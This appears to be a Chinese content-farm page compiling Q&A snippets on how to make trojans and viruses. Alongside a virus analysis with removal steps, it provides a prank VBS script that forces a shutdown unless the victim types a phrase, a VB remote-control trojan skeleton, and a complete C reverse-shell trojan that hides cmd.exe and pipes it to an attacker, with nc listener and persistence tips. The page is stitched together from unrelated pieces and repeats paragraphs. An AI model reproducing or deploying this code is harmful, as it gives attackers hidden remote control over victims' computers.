木马程序源代码-木马程序编写教程cmd

hacker|
186

我的电脑开机后不定时出现一个全屏女鬼,几秒钟后消失,不定哪会又出以来,请问高手怎么回事呀

这个女鬼病毒是用VB语言写的,需要一个VB的动态链接库,有些用户系统上可能没有这个文件,病毒因此就无法被激活。该女鬼病毒在感染用户系统后,会不定时的在电脑上出现恐怖的女鬼,并伴有阴森恐怖的鬼哭狼嚎的声音。女鬼每次出现大约停留30秒钟,低垂着脑袋,披头散发,两眼还射出红光,加上阴森的恐怖之声,使人在夜间开电脑时,不禁毛骨悚然,吓到腿软。

该病毒的技术特征如下:

病毒名称:GirlGhost2

病毒大小:344064Bytes

病毒体文件名:(未设置键值).EXE

病毒感染分析:

a. 病毒伪装成目录的图标,执行后删除本身,在windows系统目录下生成.exe 和 (未设置键值).exe两个文件,同时在ie的临时目录下生成mm2.jpg.exe文件。

b. 修改注册表项

HKEY_CLASSES_ROOT\jpegfile\shell\open\command的默认值为C:\WINDOWS\Temporary Internet Files\mm2.jpg.exe %1

当双击jpg文件时病毒就会执行。

修改以下注册表项使系统启动会自动加载:

修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run的默认值改为 (未设置键值)(对应其生成的文件(未设置键值).exe);

修改HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices的默认值改为(对应其生成的文件?exe)。

c.中毒后,会不定时出现恐怖的女鬼(停留约30秒)并伴有阴森恐怖的鬼嚎声音。

病毒演示:

点击观看演示(注意:胆小者或黑暗环境下勿看!)

清除方法:

1.更新您的杀毒软件的病毒库;

2.删除注册表中病毒创建的键值:

HKLMSoftwareMicrosoftWindowsCurrentVersionRun= %Registry path where the file was run % gfg.exe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices=

%Registry path where the file was run% gfg.exe

3.重启机器;

4.利用杀毒软件进行扫描,一旦发现,立即杀除。

病毒软件怎么制作

问题一:我想做个简单的木马病毒,怎么做,用什么软件 你好!这就需要用到一款远程控制软件,例如灰鸽子等等 有了这款远控软件 需要有一个自己的动态域名 然后用动态域名在远程控制软件上生成一个木马病毒 这样你就可以发给别人,别人中罚木马病毒之后他的电脑完全就会被控制 你就可以对他的电脑重启、关机等操作了 不过我劝你最好还是打消这个念头 即便是你拥有了远程控制软件 成功生成了木马病毒 给别人发过去 也是无法起到任何作用的 原因就是木马病毒不是免杀的 现在的杀毒软件不是吃素的 如果不是免杀的病毒给别人发过去杀毒软件立马就查杀了 没什么作用 最重要的就是你做的病毒免杀 对方的杀毒软件查杀不出来是病毒 这样就可以了 但是不要抱幻想 网上绝对不会出现免杀远控的 有的打着名字的旗号捆绑后门病毒 试想一下 别人辛辛苦苦制作出来的免杀远控会轻易的给别人或者发布到网上么?况且 免杀病毒最好不要发到网上 否则能免杀一个星期左右的病毒发到网上 估计第二天就被杀了 本人纯手打 觉得有帮助 请采纳 谢谢!!

问题二:自己怎么制作病毒软件 30分 先把编程学好了再研究做病毒

问题三:怎么制作电脑病毒 方法如下:在开始内点击运行输入at xx:xx shutdown -s,xx:xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消,就输入shutdown -a就可以取消了.

我听一个朋友说,有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。

脚本,例如下面的东西。就可以实现。

1。

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看

把隐藏已知文件类型的扩展名前面的勾去掉.

然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject(wscript.shell)

WSHshellA.run cmd.exe /c shutdown -r -t 60 -c 说我是猪,不说我是猪就一分钟关你机,不信,你试试・・・ ,0 ,true

dim a

do while(a 我是猪)

a = inputbox (说我是猪,就不关机,快撒,说 我是猪 ,说不说,不说,8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,MsgBox

loop

msgbox chr(13) + chr(13) + chr(13) + 早说就行了嘛,呵呵,猪

dim WSHshell

set WSHshell = wscript.createobject(wscript.shell)

WSHshell.run cmd.exe /c shutdown -a,0 ,true

msgbox chr(13) + chr(13) + chr(13) + 哈哈哈哈,真过瘾

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打

开了就在60秒内要关闭计算机,

结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任

意想说的话,要是对付你喜欢的人,

就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打

开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

WScript.Echo(嘿,谢谢你打开我哦,我等你很久拉!TSName)

WScript.Echo(你是可爱的小朋吗?)

WScript.Echo(哈,我想你拉,这你都不知道吗?)

WScript.Echo(怎么才来,说~是不是不关心我)

WScript.Echo(哼,我生气拉,等你这么久,心都凉啦。)

WScript.Echo(小强很生气,......

问题四:病毒是如何制作出来的? 病毒就是一个程序文件,

通过C语言编程写代码得到的,

有的病毒很厉害,建议楼主使用腾讯电脑管家来防护电脑安全比较靠谱。

腾讯电脑管家是一款杀毒软件

中国首创,第一款响应国际主流,集杀毒+管理功能为一体的产品。

腾讯电脑管家杀毒管理二合一,16层实时防护,自带小红伞、金山等4大病毒搜索引擎,能够及时拦截钓鱼网站及木马病毒。

楼主还可以使用管家登录腾讯账号,不但能保护你的账号还能为账号加速,领游戏礼包。占用资源少,不影响楼主办公娱乐。

问题五:怎么制作电脑病毒? 你懂编程么?! 你会C VC++ JAVA VB 等一些编汇语言么 不会的话空喊个什么啊 别老想着搞人家电脑 先看你自己电脑被搞了没有

问题六:如何下载病毒制造软件? 最好不要这样,国家是禁止的,这种行为被网警查出是会付刑事责任的

问题七:木马病毒怎么制作 你懂的电脑程序编程吗,其实所谓的木马病毒也就是非法程序,如果你不懂编程和你说是对牛弹琴,不要害人了~还是研究一下怎么把你的人生搞个木马吧,让自己多活几年长命百岁吧!(忠告哦!)

问题八:杀毒软件是怎么做出来的? 这个 ,真不好说

杀毒软件和普通软件都是差不多的,做法都是一样的

最重要的还是病毒库,要弄清每个病毒

很累人的工作

至于开发杀软,这个我不是专业的,帮不上你的忙

zhidao.baidu/question/99290036

百万的病毒库,你看看要几年吧……

问题九:怎么制作简单的木马程序 您好

1,制作木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。

2,制作出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始盗取帐号木马以及破坏程序。

3,所以如果自己受到了攻击或者盗号,不要用这种方式,要以正当途径来解决。

4,建议您到腾讯电脑管家官网下载一个电脑管家。

5,电脑管家拥有16层实时防护功能和QQ帐号全景防御系统,可以从上网安全、应用入口、系统底层等全方位保护电脑安全不受木马病毒侵袭,而且电脑管家还可以全方位多维度保护账号安全,精确打击盗号木马,瞬时查杀并对风险预警。

如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难

怎样用CMD查木马呀?

用CMD肯定是不能查杀木马的,否则谁还用杀毒软件呀-_-

你说的这种情况,可以启动到安全模式来杀毒的,安全模式病毒不能运行,自然就不能禁止你的杀软了

你就可以使用电脑管家来查杀一下,清除病毒了

木马怎么做 (举例)

使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是,在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口;

Case 5

屏蔽开始菜单;

Case 6

按照客户机端传过来的文件名或目录名,而删除它;

Case 7

屏蔽热启动键;

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。

这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。

成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。

求一个简单木马的源代码。必须注明每个语句的作用。只为交作业。有的百度私信我

//一个简单木马的源代码

#include stdio.h

#include winsock2.h

#pragma comment(lib,"Ws2_32.lib")

void main()

{

WSADATA wsa;

SOCKET corky;

struct sockaddr_in add;

WSAStartup(MAKEWORD(2,2),wsa);//初始化

corky=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);//创建套接字corky

add.sin_family=AF_INET;//填充sockaddr_in结构

add.sin_port=htons(918); //换成你的端口

add.sin_addr.s_addr=inet_addr("127.0.0.1");//换成你的ip地址

connect(corky,(struct sockaddr *)add,sizeof(add)); //连接控制端

STARTUPINFO si; //创建STARTUPINFO结构

ZeroMemory(si,sizeof(si));//为STARTUPINFO结构分配内存

si.cb=sizeof(si);

si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//要使用的标志位

si.wShowWindow=SW_HIDE;//隐藏cmd.exe窗口

si.hStdInput=si.hStdOutput=si.hStdError=(void *)corky;//重定向输入输出到套接字corky

PROCESS_INFORMATION pi;

CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,si,pi);//创建cmd.exe进程

ExitProcess(0);

}

//用nc监听你的918端口(nc -l -p 918)然后耐心等待对方启动木马吧!

//提示:nc在《网友世界》2008 3月光盘中winowsPE系统的外挂程序中可以找到

//如果木马启动你在nc的窗口就会得到一个带微软版权的提示

//输入dir命令看看就会看到对方目录下的所有文件信息(木马所在目录)

//用del命令可以删除他的文件了

//不过还是有缺陷就是对方可以看到有一个cmd窗口笨蛋也知道中招了哈哈..

//到时警察叔叔来找你可别怪我提醒你呦!

//你可以完善它如向系统添加启动项让它随系统启动

//最好是感染文件让它随宿主的打开而启动

//你还要完善窗口的隐藏

//本代码在XP+VC++6.0下调试通过

0条大神的评论

发表评论